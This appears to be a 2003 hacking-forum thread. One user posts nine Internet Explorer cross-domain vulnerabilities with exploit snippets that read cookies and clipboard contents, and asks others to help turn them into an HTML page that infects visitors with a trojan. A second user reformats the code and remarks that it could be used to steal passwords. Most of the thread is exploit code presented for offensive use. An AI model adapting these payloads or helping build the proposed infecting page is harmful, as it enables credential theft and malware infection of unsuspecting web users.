raptor
Oct 24 2003, 10:23 PM
i've read about these 9 known ie vuln's and i wanter if we could work all together to make them work for us and if we can make an html that will infect with trojan visitors...
------------------------------
| QUOTE |
showModalDialogCache: var fVuln=oWin.showModalDialog;Exploit - IE 5.5: fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability.Impact: Full access in IE5.5, "My Computer" zone access in IE6.
externalCache: var oVuln=oWin.external;Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");Impact: Full access.
createRangeCache: var fVuln=oWin.document.selection.createRange;Exploit: fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");Impact: Full access.
elementFromPointCache: var fVuln=oWin.document.elementFromPoint;Exploit: alert(fVuln(1,1).document.cookie);Impact: Full access.
getElementByIdCache: var fVuln=oWin.document.getElementById;Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);Impact: Full access.
getElementsByNameCache: var fVuln=oWin.document.getElementsByName;Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);Impact: Full access.
getElementsByTagNameCache: var fVuln=oWin.document.getElementsByTagName;Exploit: alert(fVuln("BODY")[0].document.cookie);Impact: Full access.
execCommandCache: var fVuln=oWin.document.execCommand;Exploit: fVuln("SelectAll"); fVuln("Copy"); alert(clipboardData.getData("text"));Impact: Read access to the loaded document.
clipboardDataCache: var oVuln=oWin.clipboardData;Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");Impact: Read/write access to the clipboard, regardless of settings. |
Yorn
Oct 25 2003, 01:31 AM
For easier reading:
| CODE |
showModalDialogCache:
var fVuln=oWin.showModalDialog;
Exploit - IE 5.5:
fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg" vulnerability.
Impact: Full access in IE5.5, "My Computer" zone access in IE6.
externalCache:
var oVuln=oWin.external;
Exploit:
oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
Impact: Full access.
createRangeCache:
var fVuln=oWin.document.selection.createRange;
Exploit:
fVuln().pasteHTML("<img src=\"javascript:alert(document.cookie)\">");
Impact: Full access.
elementFromPointCache:
var fVuln=oWin.document.elementFromPoint;
Exploit:
alert(fVuln(1,1).document.cookie);
Impact: Full access.
getElementByIdCache:
var fVuln=oWin.document.getElementById;
Exploit:
alert(fVuln("ElementIdInNewDoc").document.cookie);
Impact: Full access.
getElementsByNameCache:
var fVuln=oWin.document.getElementsByName;
Exploit:
alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
Impact: Full access.
getElementsByTagNameCache:
var fVuln=oWin.document.getElementsByTagName;
Exploit:
alert(fVuln("BODY")[0].document.cookie);
Impact: Full access.
execCommandCache:
var fVuln=oWin.document.execCommand;
Exploit:
fVuln("SelectAll");
fVuln("Copy");
alert(clipboardData.getData("text"));
Impact: Read access to the loaded document.
clipboardDataCache:
var oVuln=oWin.clipboardData;
Exploit:
alert(oVuln.getData("text"));
or
oVuln.setData("text","data");
Impact: Read/write access to the clipboard, regardless of settings. |
Note: These look like XSS vulnerabilities, so you could get passwords with them, but you won't be executing any files on their machine.
